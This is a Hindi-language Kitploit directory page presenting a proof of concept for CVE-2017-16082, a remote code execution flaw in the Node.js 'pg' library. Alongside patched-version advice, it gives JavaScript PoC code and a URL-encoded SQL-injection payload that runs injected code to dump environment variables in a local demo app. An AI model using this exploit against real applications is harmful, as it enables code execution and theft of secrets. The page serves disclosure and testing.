Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-16082 — NodeJS + Postgres (रिमोट कोड निष्पादन) 🛰 | Kitploit
उपकरण/GitHubGitHub/nulldreams/cve-2017-16082
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubnulldreams/cve-2017-16082

CVE-2017-16082

NodeJS + Postgres (रिमोट कोड निष्पादन) 🛰

रिपॉजिटरी देखें
57 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-16082

अवलोकन

pg के प्रभावित संस्करणों में एक दूरस्थ कोड निष्पादन भेद्यता होती है, जो तब उत्पन्न होती है जब दूरस्थ डेटाबेस या क्वेरी एक विशेष रूप से तैयार किया गया कॉलम नाम निर्दिष्ट करती है।

ऐसे दो विशिष्ट परिदृश्य हैं जिनमें किसी एप्लिकेशन के भेद्य होने की संभावना होती है:

  1. एप्लिकेशन असुरक्षित, उपयोगकर्ता-आपूर्ति की गई SQL निष्पादित करता है जिसमें दुर्भावनापूर्ण कॉलम नाम होते हैं।
  2. एप्लिकेशन एक अविश्वसनीय डेटाबेस से कनेक्ट होता है और एक क्वेरी निष्पादित करता है जो ऐसे परिणाम लौटाती है जिनमें एक दुर्भावनापूर्ण कॉलम नाम होता है।

अवधारणा का प्रमाण

root@kitploit:~
const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})

सुधार

  • संस्करण 2.x.x: संस्करण 2.11.2 या बाद के संस्करण में अपडेट करें।
  • संस्करण 3.x.x: संस्करण 3.6.4 या बाद के संस्करण में अपडेट करें।
  • संस्करण 4.x.x: संस्करण 4.5.7 या बाद के संस्करण में अपडेट करें।
  • संस्करण 5.x.x: संस्करण 5.2.1 या बाद के संस्करण में अपडेट करें।
  • संस्करण 6.x.x: संस्करण 6.4.2 या बाद के संस्करण में अपडेट करें। ( ध्यान दें कि संस्करण 6.1.6, 6.2.5, और 6.3.3 भी पैच किए गए हैं। )
  • संस्करण 7.x.x: संस्करण 7.1.2 या बाद के संस्करण में अपडेट करें। ( ध्यान दें कि संस्करण 7.0.2 भी पैच किया गया है। )

स्थानीय परीक्षण 💣

git clone https://github.com/nulldreams/CVE-2017-16082.git

cd CVE-2017-16082

npm i && node server.js

localhost:5000/api/v1/users?id=1 पर एक अनुरोध भेजें। परिणाम

root@kitploit:~
[
    {
        "id": 1,
        "username": "wubba",
        "password": "123",
        "createdAt": "2018-11-27T09:19:54.000Z",
        "updatedAt": "2018-11-27T09:19:54.000Z"
    }
]

अब, इस तरह के पेलोड का उपयोग करके एक अनुरोध भेजें: 1;SELECT 1 AS "\']=0;console.log(process.env)//" और इसे यूआरएल एन्कोडर में एनकोड करें।

अंतिम URL: localhost:5000/api/v1/users?id=1%3BSELECT%201%20AS%20%22%5C%27%5D%3D0%3Bconsole.log(process.env)%2F%2F%22

root@kitploit:~
[
    {
        "id": 1,
        "username": "wubba",
        "password": "123",
        "createdAt": "2018-11-27T09:19:54.000Z",
        "updatedAt": "2018-11-27T09:19:54.000Z"
    },
    {
        "\\": 0
    }
]

टर्मिनल सर्वर की जाँच करें।

टूल डाउनलोड करें